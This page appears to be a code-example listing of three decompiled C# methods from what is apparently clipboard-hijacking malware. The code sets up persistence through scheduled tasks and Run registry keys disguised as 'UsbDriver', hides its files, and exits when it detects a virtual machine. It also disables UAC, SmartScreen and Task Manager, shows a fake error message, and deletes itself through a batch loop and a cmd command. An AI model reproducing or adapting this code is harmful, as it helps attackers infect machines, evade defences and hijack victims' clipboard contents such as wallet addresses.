예제 #1
0
        // Token: 0x06000056 RID: 86 RVA: 0x00004278 File Offset: 0x00002478
        public static void CopyAndShelduderInizialize()
        {
            ProcessControl.KillClipInizialize();
            string startUpFromAppDataReserv = GlobalPath.StartUpFromAppDataReserv;
            string text = Path.Combine(startUpFromAppDataReserv, Path.GetFileName(GlobalPath.AssemblyPath.Replace(GlobalPath.AssemblyPath, "Ushellg.exe")));

            RunSystem.Scheduler(false, "minute", 1, "highest", "UsbDriver", "\"" + text + "\"");
            RegistryControl.RegStartupInizialize(false, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbDriver", text);
            Directory.Delete(GlobalPath.StartUpFromAppDataReserv);
            Thread.Sleep(2000);
            if (!Directory.Exists(startUpFromAppDataReserv) && GlobalDirectory.CreateDirectory(startUpFromAppDataReserv))
            {
                File.Copy(GlobalPath.AssemblyPath, text, false);
                Thread.Sleep(2000);
                if (File.Exists(text))
                {
                    if (RunCheck.IsUserAdministrator())
                    {
                        RunSystem.Scheduler(true, "minute", 1, "highest", "UsbDriver", "\"" + text + "\"");
                        RegistryControl.RegStartupInizialize(true, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbNDriver", text);
                        if (!GlobalFile.IsHideOrNo())
                        {
                            GlobalFile.HideFile(text, FileAttributes.Hidden);
                            return;
                        }
                    }
                    else
                    {
                        RegistryControl.RegStartupInizialize(true, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbNDriver", text);
                        if (!GlobalFile.IsHideOrNo())
                        {
                            GlobalFile.HideFile(text, FileAttributes.Hidden);
                        }
                        ProcessControl.RunFile(text);
                    }
                }
            }
        }
예제 #2
0
 // Token: 0x06000008 RID: 8 RVA: 0x00002450 File Offset: 0x00000650
 public static void Inizialize(string pathfile)
 {
     try
     {
         using (StreamWriter streamWriter = new StreamWriter(pathfile))
         {
             streamWriter.WriteLine("@echo off");
             streamWriter.WriteLine(":loop");
             streamWriter.WriteLine("del \"" + GlobalPath.GetFileName + "\"");
             streamWriter.WriteLine("if Exist \"" + GlobalPath.GetFileName + "\" GOTO loop");
             streamWriter.WriteLine("del %0");
             streamWriter.Flush();
         }
     }
     catch (Exception ex)
     {
         File.WriteAllText("Self_Error.txt", ex.Message);
     }
     if (File.Exists(pathfile))
     {
         ProcessControl.RunFile(pathfile);
     }
 }
예제 #3
0
 public static void Main()
 {
     if (RunCheck.CheckMutex())
     {
         Date date = new Date();
         if (date.AntiVm && CheckVirtual.CheckWMI())
         {
             Environment.Exit(0);
         }
         if (date.Delay)
         {
             Program.Sleeping(RunCheck.ThreadSleep);
         }
         if (GlobalPath.AssemblyPath.StartsWith(GlobalPath.StartUpFromAppDataReserv, StringComparison.OrdinalIgnoreCase))
         {
             if (!GlobalFile.IsHideOrNo())
             {
                 GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Hidden);
             }
             ClipChanger.StartChanger();
             return;
         }
         new Thread(delegate()
         {
             ProcessControl.KillClipInizialize();
         })
         {
             IsBackground = true
         }.Start();
         if (date.AddGarbage)
         {
             new Thread(delegate()
             {
                 Garbage.InizializeTrash(500);
             }).Start();
         }
         if (date.FakeText)
         {
             File.WriteAllText(string.Concat(new string[]
             {
                 "Error.txt"
             }), GlobalPath.MessageErrorTextForUser);
         }
         if (date.AddInSystemRun)
         {
             InjReg.CopyAndShelduderInizialize();
             RegistryControl.ToogleHidingFolders("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "Hidden", 2);
             ExpSetting.RefreshExplorer();
             if (date.Uac)
             {
                 RegistryControl.ToogleUacAdmin("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0);
             }
             if (date.Smart)
             {
                 RegistryControl.ToogleSmartScreen("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", "SmartScreenEnabled", "Off");
             }
             if (date.TaskLock)
             {
                 RegistryControl.ToogleTaskMandRegedit("Software\\Microsoft\\Windows\\CurrentVersion\\Policies", 1);
             }
             GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Normal);
             Liquidation.Inizialize(GlobalPath.BatchFile);
             Liquidation.SelfDelete("cmd.exe", "/C choice /C Y /N /D Y /T 1 & Del \"" + GlobalPath.GetFileName);
             return;
         }
         if (!GlobalFile.IsHideOrNo())
         {
             GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Hidden);
             ClipChanger.StartChanger();
             return;
         }
     }
     else
     {
         Environment.Exit(0);
     }
 }